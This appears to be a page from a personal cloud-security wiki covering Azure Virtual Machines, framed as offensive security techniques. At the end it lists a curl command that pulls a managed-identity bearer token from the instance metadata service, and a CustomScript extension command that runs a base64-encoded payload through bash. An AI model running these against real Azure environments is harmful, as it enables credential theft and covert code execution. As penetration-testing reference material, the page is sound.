Tech with Tyler

Ctrlk

LinkedIn GitHub YouTube

Azure Virtual Machines

Overview of the Azure Virtual Machines service

Overview

Provides on-demand virtual compute resources

Capabilities

Extensions

Extensions are small applications that provide post-deployment configuration and automation on Azure virtual machines (VMs) both on Windows and Linux such as executing code, installers, and more
Requires the Azure Windows VM Agent or Azure Linux VM Agent
Extensions may be region dependent

Instance Metadata Service (IMDS)

Exposes several categories of information such as instance details (OS info, networking, etc.), scheduled events (VM maintenance jobs), Load Balancer info, tokens for Managed Identities (if assigned), and more
Available at the following URL: http://169.254.169.254/metadata/

Retrieving Access Token

If a Managed Identity is assigned to the instance, we can retrieve its bearer token
Other examples such as using GO, Python, etc. are found here

Security Configuration

Commands & Examples

Execute Arbitrary Code

Reverse Shell

CLI Cheat Sheet

GitBookapp.gitbook.com

Offensive Security Tactics & Techniques

links to examples

Additional Resources

Overview of virtual machines in Azure - Azure Virtual MachinesMicrosoftLearn

PreviousCompute NextDatabases

Last updated 6 days ago

Was this helpful?

HEADER="Metadata:true"
URL="http://169.254.169.254/metadata"
API_VERSION="2021-12-13"

curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://vault.azure.net/"

az vm extension set \
  --resource-group <resource-group-name> \
  --vm-name <vm-name> \
  --name CustomScript \
  --publisher Microsoft.Azure.Extensions \
  --version 2.1 \
  --settings '{}' \
  --protected-settings '{"commandToExecute": "nohup echo <base64-encoded-command> | base64 -d | bash &"}'